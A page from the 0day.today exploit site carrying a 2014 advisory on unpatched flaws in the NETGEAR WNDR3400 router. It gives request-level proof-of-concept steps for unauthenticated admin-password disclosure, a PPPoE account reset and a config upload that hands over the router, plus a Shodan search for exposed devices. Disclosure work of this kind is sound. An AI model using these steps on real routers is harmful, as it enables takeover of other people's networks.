0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities

Author

Santhosh Kumar

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

Title: Multiple vulnerabilities in NETGEAR N600 WIRELESS DUAL BAND WNDR3400
====================================================================================
Notification Date:  4/14/2014
Affected Vendor:    NETGEAR N600 WIRELESS DUAL BAND WNDR3400
Firmware Version: Firmware Version 1.0.0.38 AND BELOW (ALL versions affected)
Issue Types: password Disclosure File Uploading with AuthPPOPE settings Change
Discovered by: Santhosh Kumar twitter: @security_b0x
Issue status: No Patch >From the Vendors.
grettings: @Anami2111 (anamika singh) -- creator of wihawk
 
 
 
====================================================================================
Summary:
========
While i was lurking around the Netgear firmware today i came across various tweaking and others i was able to find a password disclosure,File uploading vulnerably which could compromise the entire router.as of now no patch from the vendor.
 
Password Disclosure:
====================
url: server/unauth.cgi?id=393087602
Generating with the 401 unauthorised error
poc:
Host: server:8080
 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://server:8080/
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 0<p class="MNUTitle">Router Password Recovered</p>
 
    <table border="0" cellpadding="0" cellspacing="3" style="width:600px">
    <col width="200" />
    <col width="400" />
    <tr>
    <td colspan="2" class="MNUText">You have successfully recovered the admin password.</td>
    </tr>
    <tr>
    <td class="MNUText" align="right">Router Admin Username</td>
    <td class="MNUText" align="left">admin</td>
    </tr>
<tr>
<td class="MNUText" align="right">Router Admin Password</td>
<td class="MNUText" align="left">password</td>
</tr>
\<tr>
 
poc2:
 
server:8080/passwordrecovered.cgi?id=1738955828
 
<tr>
<td colspan="2" class="MNUText">You have successfully recovered the admin password.</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Username</td>
<td class="MNUText" align="left">admin</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Password</td>
    <td class="MNUText" align="left">0514</td>
</tr>
<tr>
<td colspan="2" class="MNUText">You can now log in to the router using username "admin" and this recovered password.</td>
</tr>
<tr>
 
==============================================================================================================================
 
Ppope account reset:
 
Netgear runs a utility called "netgear genie" which does not have proper authentication on reaching "genie_pppoe.htm "
 
which allows to reset the ppoe username which any basic authentication.
 
http://server/genie_pppoe.htm
 
==============================================================================================================================
 
File Upload (router reset):
 
like the same one above the "http://server/genie_restore.htm"
 
the config file can be uploaded which leading to reseting the control to attackers username and password.
 
*.cfg file.
 
 
==============================================================================================================================
SHODAN DORK:
wndr3400: 10198 for wndr3400

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities

Report Error

Report Error